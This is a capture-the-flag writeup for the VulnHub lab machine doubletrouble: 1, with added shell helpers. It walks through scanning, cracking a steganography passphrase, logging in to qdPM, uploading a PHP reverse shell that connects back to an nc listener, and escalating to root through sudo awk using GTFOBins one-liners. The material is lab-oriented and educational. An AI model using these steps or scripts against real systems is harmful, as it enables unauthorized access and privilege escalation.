IT and security stuff

doubletrouble: 1 Writeup

In this writeup, I will go through doubletrouble: 1, made by tasiyanci and available for free on VulnHub.

The first step is to find the machine's IP address on the 192.168.56.0/24 lab network.

sudo nmap 192.168.56.0/24 -T4

The address is 192.168.56.103 and two ports are open: 22 (SSH) and 80 (HTTP, presumably a website). Without -p, nmap only probes its 1000 most common ports, so a full -p- scan against the host is worth running before concluding that these are the only two.

Port 80 serves qdPM, an open-source PHP project management web app.

Now, let’s see if there are any directories we can find with dirsearch.

So far we have found a couple of directories. None of them is really useful except /secret.

In /secret I find a JPEG file. At first this seems useless, but CTF experience says there is a good chance something is hidden in it.

Let's download it and analyze it with steganography tools.

The embedded data is protected by a passphrase. Let's brute-force it with a wordlist.

Found it! Let's see what it's hiding.
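An added example of the passphrase brute force above, written for this edit and not taken from the writeup. It assumes the image was embedded with steghide (the writeup does not name its tool) and that a wordlist such as rockyou.txt is available; the file names are placeholders.

```shell
# Added example: brute-force a steghide passphrase with a wordlist.
# Not the writeup's commands. Assumes steghide was the embedding tool
# (the writeup does not name one) and that the wordlist and file names
# used below exist; they are placeholders.

# crack_steghide IMAGE WORDLIST OUTFILE
# Tries every line of WORDLIST as the passphrase. On success prints the
# passphrase, leaves the extracted payload in OUTFILE and returns 0;
# returns 1 when the list is exhausted.
crack_steghide() {
    img="$1"; wordlist="$2"; out="$3"
    tried=0
    # The "|| [ -n ... ]" keeps a last line that has no trailing newline.
    while IFS= read -r pass || [ -n "$pass" ]; do
        [ -n "$pass" ] || continue          # skip blank lines
        tried=$((tried + 1))
        # A wrong guess makes steghide exit non-zero ("could not extract
        # any data with that passphrase!"), so the exit status is the oracle.
        if steghide extract -sf "$img" -p "$pass" -xf "$out" -f >/dev/null 2>&1; then
            printf '%s\n' "$pass"
            return 0
        fi
    done < "$wordlist"
    echo "no passphrase found after $tried attempts" >&2
    return 1
}

# Usage on the attacker box (placeholder names):
# crack_steghide doubletrouble.jpg /usr/share/wordlists/rockyou.txt hidden.txt
```

Each guess forks a new steghide process, so a large wordlist takes a while; stegseek, a purpose-built steghide cracker, runs the same wordlist far faster if it is installed.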
The extracted file contains an email address with something that looks like a password. Let's try these on the qdPM login page.

Boom! We're in! At this point my objective is to get a reverse shell on this server. There might be a way to upload files and execute them.

I use the PHP reverse shell made by pentestmonkey, with the IP and port set to my listener.

Now my file is uploaded. However, opening it from the qdPM interface only downloads it; I must find the path where the web server serves the file and executes it as PHP.

Earlier with dirsearch I found an /uploads/ directory. My file is listed there.

Before requesting the file I start my listener.

Requesting my PHP file from /uploads/ sends me a nice reverse shell.
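An added example of the delivery steps above, written for this edit and not the writeup's own commands. It assumes the attacker box is 192.168.56.1 listening on port 4444, that the shell was uploaded as shell.php and that it is served at http://192.168.56.103/uploads/shell.php; the writeup only says the upload shows up under /uploads/.

```shell
# Added example, not the writeup's own commands. Assumptions: attacker
# box 192.168.56.1 listening on 4444, the shell uploaded as shell.php and
# served at http://192.168.56.103/uploads/shell.php (the writeup only
# says the file appears under /uploads/).

# set_revshell_target FILE IP PORT
# pentestmonkey's php-reverse-shell.php ships with
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
# A shell that "never comes back" is very often one of these left unchanged.
set_revshell_target() {
    f="$1"; ip="$2"; port="$3"
    tmp=$(mktemp)
    sed -e 's/^\$ip = .*/$ip = '"'$ip'"';/' \
        -e 's/^\$port = .*/$port = '"$port"';/' "$f" > "$tmp" && mv "$tmp" "$f"
}

# revshell_target FILE -> prints "ip:port" the script will connect back to,
# a sanity check before uploading.
revshell_target() {
    ip=$(grep '^\$ip = ' "$1" | cut -d"'" -f2)
    port=$(grep '^\$port = ' "$1" | tr -dc '0-9')
    printf '%s:%s\n' "$ip" "$port"
}

# On the attacker box, in this order:
#   start_listener 4444                                     # terminal 1
#   trigger_shell http://192.168.56.103/uploads/shell.php   # terminal 2
start_listener() { nc -lvnp "$1"; }
trigger_shell() {
    # The request never completes normally, because the PHP process is
    # now busy talking to the listener, so cap the wait.
    curl -s --max-time 5 "$1" >/dev/null
}

# Example run: set_revshell_target php-reverse-shell.php 192.168.56.1 4444
#              revshell_target php-reverse-shell.php   -> 192.168.56.1:4444
```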
Checking the sudo rules for the user I landed as shows a huge misconfiguration: I can run awk as any user, including root.

GTFOBins is a great resource for abusing legitimate binaries like this one.

I run the GTFOBins sudo one-liner for awk and get a root shell. Done!
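An added example of the check behind that last step, written for this edit and not taken from the writeup: read the current user's sudo rules and map each permitted binary to its GTFOBins sudo escape. It goes slightly beyond the page by covering find and vim as well as awk. The sample sudo -l output is constructed, and the username www-data and the path /usr/bin/awk are assumptions; the writeup only says awk can be run as any user.

```shell
# Added example, not the writeup's own commands. Maps binaries allowed by
# sudo to their GTFOBins sudo escapes. The sample output below is
# constructed; "www-data" and "/usr/bin/awk" are assumptions.

# gtfo_escape BINARY -> prints the GTFOBins sudo one-liner, or returns 1
gtfo_escape() {
    case "$(basename "$1")" in
        awk)  printf '%s\n' "sudo $1 'BEGIN {system(\"/bin/sh\")}'" ;;
        find) printf '%s\n' "sudo $1 . -exec /bin/sh \\; -quit" ;;
        vim)  printf '%s\n' "sudo $1 -c ':!/bin/sh'" ;;
        *)    return 1 ;;
    esac
}

# sudo_candidates < output-of-sudo-l
# Prints "binary<TAB>escape" for every permitted binary that has an escape.
sudo_candidates() {
    # Rule lines look like "(ALL : ALL) NOPASSWD: /usr/bin/awk"; keep what
    # follows the closing parenthesis, split on commas, drop any arguments.
    grep '^ *(' | sed 's/^[^)]*)[^/]*//' | tr ',' '\n' | sed 's/^ *//; s/ .*//' |
    while IFS= read -r bin; do
        [ -n "$bin" ] || continue
        esc=$(gtfo_escape "$bin") || continue
        printf '%s\t%s\n' "$bin" "$esc"
    done
}

# Constructed sample of what "sudo -l" prints on a box like this one.
SAMPLE_SUDO_L='Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
    (root) /usr/bin/find, /bin/ls'

sudo_candidates_demo() {
    printf '%s\n' "$SAMPLE_SUDO_L" | sudo_candidates
}

# On the target: sudo -l | sudo_candidates, paste the printed escape, then
# confirm with "id" that you are uid=0 before going further.
```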
